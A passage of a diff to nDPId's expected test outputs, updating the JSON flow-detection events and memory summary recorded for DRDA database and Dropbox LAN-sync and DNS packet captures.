+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1175543772220,"flow_last_seen":1175543772338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1175543772338,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}} +00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1175543772220,"flow_last_seen":1175543810683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":4623,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1175543810683,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"drda_db2.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":38,"total-skipped-flows":0,"total-l4-payload-len":4623,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1175543810683} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 38/38 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872593 bytes -~~ total memory freed........: 5872593 bytes -~~ total allocations/frees...: 118153/118153 +~~ total memory allocated....: 6006227 bytes +~~ total memory freed........: 6006227 bytes +~~ total allocations/frees...: 120915/120915 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 457 chars ~~ json string max len.......: 692 chars diff --git a/test/results/dropbox.pcap.out b/test/results/dropbox.pcap.out index 432c47417..ad7cef724 100644 --- a/test/results/dropbox.pcap.out +++ b/test/results/dropbox.pcap.out @@ -2,104 +2,104 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dropbox.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1455907271481} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1455907271481,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1455907271481,"pkt":"CAAnmO\/hCAAnAERyCABFAAB8EMQAAIARN\/bAqDgBwKg4ZcSHRFwAaLRJQwM1AW9STXJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxMSBFRVQgMjAxNiJ9"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1455907271483,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":61,"pkt_l4_len":27,"thread_ts_msec":1455907271483,"pkt":"CAAnAERyCAAnmO\/hCABFAAAvXYVAAEAR64HAqDhlwKg4AURcxIcAG\/HjY0Q1AW9STYsvci9CdXMxN0NtZA=="} 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1455907271585,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1455907271585,"pkt":"CAAnmO\/hCAAnAERyCABFAAB7EM0AAIARN+7AqDgBwKg4ZcSHRFwAZzJrQgM1Anj4ckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjExIEVFVCAyMDE2In0="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1455907272856,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1455907272856,"pkt":"CAAnmO\/hCAAnAERyCABFAAB7EWkAAIARN1LAqDgBwKg4ZcSORFwAZ7scQgMdqQeYckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjEyIEVFVCAyMDE2In0="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1455907272858,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1455907272858,"pkt":"CAAnAERyCAAnmO\/hCABFAAAuXhFAAEAR6vbAqDhlwKg4AURcxI4AGvHiYkQdqQeYiy9yL0J1czE3Q21k"} 00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1455907272969,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1455907272969,"pkt":"CAAnmO\/hCAAnAERyCABFAAB\/EYMAAIARNzTAqDgBwKg4ZcSORFwAa8WlRgMdqhF5z0YYRXJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxMyBFRVQgMjAxNiJ9"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907274088,"flow_last_seen":1455907274088,"flow_idle_time":200000,"flow_min_l4_payload_len":97,"flow_max_l4_payload_len":97,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1455907274088,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1455907274088,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1455907274088,"pkt":"CAAnmO\/hCAAnAERyCABFAAB9EncAAIARNkLAqDgBwKg4ZcSIRFwAaR7GRANSj9XGl0FyRFxBcghCdXMxN0NtZBEy\/3sibWVzc2FnZVR5cGUiOiJVUERBVEUiLCJtZXNzYWdlQ29udGVudCI6IkZyaSBGZWIgMTkgMjA6NDE6MTQgRUVUIDIwMTYifQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907274088,"flow_last_seen":1455907274088,"flow_idle_time":200000,"flow_min_l4_payload_len":97,"flow_max_l4_payload_len":97,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1455907274088,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907274088,"flow_last_seen":1455907274088,"flow_idle_time":200000,"flow_min_l4_payload_len":97,"flow_max_l4_payload_len":97,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1455907274088,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1455907274089,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1455907274089,"pkt":"CAAnAERyCAAnmO\/hCABFAAAwXqNAAEAR6mLAqDhlwKg4AURcxIgAHPHkZERSj9XGl0GLL3IvQnVzMTdDbWQ="} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1455907274193,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1455907274193,"pkt":"CAAnmO\/hCAAnAERyCABFAACBEpIAAIARNiPAqDgBwKg4ZcSIRFwAbeMnSANSkLugNTWCkTE2ckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjE0IEVFVCAyMDE2In0="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907275690,"flow_last_seen":1455907275690,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1455907275690,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1455907275690,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1455907275690,"pkt":"CAAnmO\/hCAAnAERyCABFAAB\/FCAAAIARNJfAqDgBwKg4ZcSPRFwAa2JLRgOAZtDWwMpn\/nJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxNSBFRVQgMjAxNiJ9"} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907275690,"flow_last_seen":1455907275690,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1455907275690,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907275690,"flow_last_seen":1455907275690,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1455907275690,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1455907275695,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1455907275695,"pkt":"CAAnAERyCAAnmO\/hCABFAAAyX35AAEAR6YXAqDhlwKg4AURcxI8AHvHmZkSAZtDWwMpn\/osvci9CdXMxN0NtZA=="} 00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1455907275831,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1455907275831,"pkt":"CAAnmO\/hCAAnAERyCABFAACAFEwAAIARNGrAqDgBwKg4ZcSPRFwAbLkURwOAZ6ExGoh1VzNyRFxBcghCdXMxN0NtZBEy\/3sibWVzc2FnZVR5cGUiOiJVUERBVEUiLCJtZXNzYWdlQ29udGVudCI6IkZyaSBGZWIgMTkgMjA6NDE6MTUgRUVUIDIwMTYifQ=="} 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","packets-captured":801,"packets-processed":800,"total-skipped-flows":0,"total-l4-payload-len":47076,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":4,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1459182796665} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182796665,"flow_last_seen":1459182796665,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182796665,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1459182796665,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1459182796665,"pkt":"8IQvSpdgeJKcD6iOCABFAABAOLtAAEARfTrAqAFpwKgB\/thvADUALFKSg5wBAAABAAAAAAAABmNsaWVudAdkcm9wYm94A2NvbQAAAQAB"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182796665,"flow_last_seen":1459182796665,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182796665,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182796665,"flow_last_seen":1459182796665,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182796665,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1459182796665,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1459182796665,"pkt":"8IQvSpdgeJKcD6iOCABFAABAOLtAAEARfTrAqAFpwKgB\/thvADUALFKSg5wBAAABAAAAAAAABmNsaWVudAdkcm9wYm94A2NvbQAAAQAB"} 00825{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1459182796786,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1459182796786,"pkt":"eJKcD6iO8IQvSpdgCABFAAE\/AABAAEARtPbAqAH+wKgBaQA12G8BK6cig5yBgAABAAMABAAEBmNsaWVudAdkcm9wYm94A2NvbQAAAQABwAwABQABAAAAwAALBmNsaWVudAF2wBPAMAABAAEAAAAUAARsoKzMwDAAAQABAAAAFAAEbKCs7MA3AAIAAQAA9bUAGQducy0xOTI2CWF3c2Rucy00OAJjbwJ1awDANwACAAEAAPW1ABYGbnMtNzczCWF3c2Rucy0zMgNuZXQAwDcAAgABAAD1tQASBW5zLTU3CWF3c2Rucy0wN8AbwDcAAgABAAD1tQAXB25zLTEyNzYJYXdzZG5zLTMxA29yZwDArgABAAEAAkcJAATN+8A5wIwAAQABAAJG7wAEzfvDBcDMAAEAAQACRu8ABM37xPzAZwABAAEAAkbkAATN+8eG"} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":803,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182796665,"flow_last_seen":1459182796786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1459182796786,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client.dropbox.com","num_queries":1,"num_answers":11,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"108.160.172.204"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":803,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182796665,"flow_last_seen":1459182796786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1459182796786,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client.dropbox.com","num_queries":1,"num_answers":11,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"108.160.172.204"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":805,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182798602,"flow_last_seen":1459182798602,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1459182798602,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":805,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1459182798602,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1459182798602,"pkt":"8IQvSpdgeJKcD6iOCABFAABDOVFAAEARfKHAqAFpwKgB\/r\/YADUALxT2I4YBAAABAAAAAAAACWNsaWVudC1jZgdkcm9wYm94A2NvbQAAAQAB"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182798602,"flow_last_seen":1459182798602,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1459182798602,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client-cf.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182798602,"flow_last_seen":1459182798602,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1459182798602,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": 